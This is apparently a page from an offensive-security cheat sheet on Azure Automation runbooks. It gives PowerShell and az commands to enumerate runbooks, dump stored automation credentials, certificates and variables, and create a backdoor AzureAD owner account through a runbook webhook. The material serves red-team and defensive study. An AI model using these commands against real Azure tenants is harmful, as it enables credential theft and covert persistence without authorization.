azure-services-runbook.md (3748B)
1 --- 2 title: "Azure Services - Runbook and Automation" 3 section: "Cloud" 4 sectionSlug: "cloud" 5 sourcePath: "docs/cloud/azure/azure-services-runbook.md" 6 sourceUrl: "https://github.com/swisskyrepo/InternalAllTheThings/blob/203bb0c0b290/docs/cloud/azure/azure-services-runbook.md" 7 sha: "203bb0c0b290" 8 isIndex: false 9 --- 10 11 # Azure Services - Runbook and Automation 12 13 ## Runbook 14 15 Runbook must be **SAVED** and **PUBLISHED** before running it. 16 17 ### List the Runbooks 18 19 ```ps1 20 Get-AzAutomationAccount | Get-AzAutomationRunbook 21 ``` 22 23 ### Create a Runbook 24 25 * Check user right for automation 26 27 ```powershell 28 az extension add --upgrade -n automation 29 az automation account list # if it doesn't return anything the user is not a part of an Automation group 30 az ad signed-in-user list-owned-objects 31 ``` 32 33 * Add the user to the "Automation" group: `Add-AzureADGroupMember -ObjectId <OBJID> -RefObjectId <REFOBJID> -Verbose` 34 * Get the role of a user on the Automation account: `Get-AzRoleAssignment -Scope /subscriptions/<ID>/resourceGroups/<RG-NAME>/providers/Microsoft.Automation/automationAccounts/<AUTOMATION-ACCOUNT>`. NOTE: Contributor or higher privileges accounts can create and execute Runbooks 35 * List hybrid workers: `Get-AzAutomationHybridWorkerGroup -AutomationAccountName <AUTOMATION-ACCOUNT> -ResourceGroupName <RG-NAME>` 36 * Create a Powershell Runbook: `Import-AzAutomationRunbook -Name <RUNBOOK-NAME> -Path C:\Tools\username.ps1 -AutomationAccountName <AUTOMATION-ACCOUNT> -ResourceGroupName <RG-NAME> -Type PowerShell -Force -Verbose` 37 * Publish the Runbook: `Publish-AzAutomationRunbook -RunbookName <RUNBOOK-NAME> -AutomationAccountName <AUTOMATION-ACCOUNT> -ResourceGroupName <RG-NAME> -Verbose` 38 * Start the Runbook: `Start-AzAutomationRunbook -RunbookName <RUNBOOK-NAME> -RunOn Workergroup1 -AutomationAccountName <AUTOMATION-ACCOUNT> -ResourceGroupName <RG-NAME> -Verbose` 39 40 ## Automation Account 41 42 ### List Automation Accounts 43 44 Azure Automation provides a way to automate the repetitive tasks you perform in your Azure environment. 45 46 ```ps1 47 Get-AzAutomationAccount 48 ``` 49 50 ### Get Automation Credentials 51 52 ```ps1 53 Get-AzAutomationAccount | Get-AzAutomationCredential 54 Get-AzAutomationAccount | Get-AzAutomationConnection 55 Get-AzAutomationAccount | Get-AzAutomationCertificate 56 Get-AzAutomationAccount | Get-AzAutomationVariable 57 ``` 58 59 ### Persistence via Automation Accounts 60 61 * Create a new Automation Account 62 * "Create Azure Run As account": Yes 63 * Import a new runbook that creates an AzureAD user with Owner permissions for the subscription* 64 * Sample runbook [NetSPI/MicroBurst](https://github.com/NetSPI/MicroBurst) 65 * Publish the runbook 66 * Add a webhook to the runbook 67 * Add the AzureAD module to the Automation account 68 * Update the Azure Automation Modules 69 * Assign "User Administrator" and "Subscription Owner" rights to the automation account 70 * Trigger the webhook with a post request to create the new user 71 72 ```powershell 73 $uri = "https://s15events.azure-automation.net/webhooks?token=h6[REDACTED]%3d" 74 $AccountInfo = @(@{RequestBody=@{Username="BackdoorUsername";Password="BackdoorPassword"}}) 75 $body = ConvertTo-Json -InputObject $AccountInfo 76 $response = Invoke-WebRequest -Method Post -Uri $uri -Body $body 77 ``` 78 79 ## Desired State Configuration 80 81 ### List the DSC 82 83 ```ps1 84 Get-AzAutomationAccount | Get-AzAutomationDscConfiguration 85 ``` 86 87 ### Export the configuration 88 89 ```ps1 90 $DSCName = ${dscToExport} 91 Get-AzAutomationAccount | Get-AzAutomationDscConfiguration | where {$_.name -match $DSCName} | Export-AzAutomationDscConfiguration -OutputFolder (get-location) -Debug 92 ``` 93 94 ## References 95 96 * [Training - Attacking and Defending Azure Lab - Altered Security](https://www.alteredsecurity.com/azureadlab)